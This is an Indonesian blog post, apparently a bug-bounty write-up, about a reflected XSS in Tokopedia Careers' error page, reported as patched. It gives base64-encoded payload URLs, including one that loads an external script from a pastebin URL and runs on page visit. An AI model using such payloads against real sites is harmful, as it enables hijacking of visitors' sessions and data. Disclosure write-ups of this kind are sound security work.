---
layout: post
title: Reflected XSS pada Tokopedia Careers
date: 2018-11-02 13:37:00 PM
permalink: /project/2018-11-02-reflected-xss-pada-tokopedia-careers/
author: xhellc0de
categories: [ pentesting, xss ]
tags: vulnerability xss reflected-xss
comments: true
image: /images/xss_img.jpg
---

![Image of XSS](/images/xss_img.jpg)


Beberapa waktu yang lalu, saya mencoba mencari Bug di situs salah satu E-Commerce di Indonesia, yaitu Tokopedia. Setelah beberapa lama melakukan Pencarian, saya menemukan link yang berisi pesan error pada Tokopedia Careers. Bentuk link nya seperti ini:

```
https://www.tokopedia.com/careers/error/?job_ref=M2QtbW90aW9uLWdyYXBoZXItZm9yLWJ1c2luZXNzLWluLWluZG9uZXNpYQ==&err=VmFsaWRhdGlvbiBmYWlsZWQ6IERvd25sb2FkIFlvdSBhcmUgbm90IGFsbG93ZWQgdG8gdXBsb2FkICJzdmciIGZpbGVzLCBhbGxvd2VkIHR5cGVzOiBwZGYsIGRvYywgZG9jeCwgb2R0LCBydGYsIGh0bWwsIGh0bSwgdHh0&app_url=aHR0cHM6Ly90b2tvcGVkaWEud29ya2FibGUuY29tL2pvYnMvNDE5NzU5L2NhbmRpZGF0ZXMvbmV3
```

Dan tampilannya seperti berikut:

![Image of Tokopedia Reflected XSS](/images/tokped_refxss1.jpg)

Dilihat dari struktur URL nya, dapat dipastikan bahwa value dari parameter job_ref, err, dan app_url di-encode dengan base64. Lalu saya melihat source code nya, dan benar saya, value tersebut di-decode dan ditampilkan pada browser.

Lalu darisitu saya mencoba melakukan testing dengan memasukan "TES XSS" yang di-encode dengan base64 pada parameter job_ref dengan menggunakan URL berikut:
```
https://www.tokopedia.com/careers/error/?job_ref=VEVTIFhTUw
```

Dan source nya berubah menjadi seperti berikut:
```
<div class="text-center">
            <a href="https://www.tokopedia.com/careers/job/TES XSS" class="btn-tkpd btn--medium btn--green" style="width: 200px;">Back to Job Details</a>
        </div>
```

Terlihat bahwa "TES XSS" masuk kedalam attribut **href**.
Karna ada di dalam Tag **a**, maka untuk mentriger XSS kita memerlukan **HTML Event Attributes** seperti onload, onmouseover, dll. Untuk contoh kali ini saya menggunakan onmouseover.

Payloadnya seperti berikut:
```
https://www.tokopedia.com/careers/error/?job_ref=eCIgb25tb3VzZW92ZXI9YWxlcnQoMTMzNyk7Ly8
```

Dan XSS akan ter-triger ketika mouse menyentuh link.

![Image of Tokopedia Reflected XSS](/images/tokped_refxss2.jpg)

Payload juga dapat dimodifikasi untuk menghilangkan user interaction, disini saya menggunakan: **"><script src=//>** dan XSS akan tereksekusi otomatis ketika link dikunjungi.

```
https://www.tokopedia.com/careers/error/?job_ref=Ij48Zm9ybT48L2Zvcm0gPjxzY3JpcHQgc3JjPSJodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvMUNrTDFFc1oiPjwvU2NSaXB0PjxhICI
```

**Status: Valid but Out of Scope (Patched)**
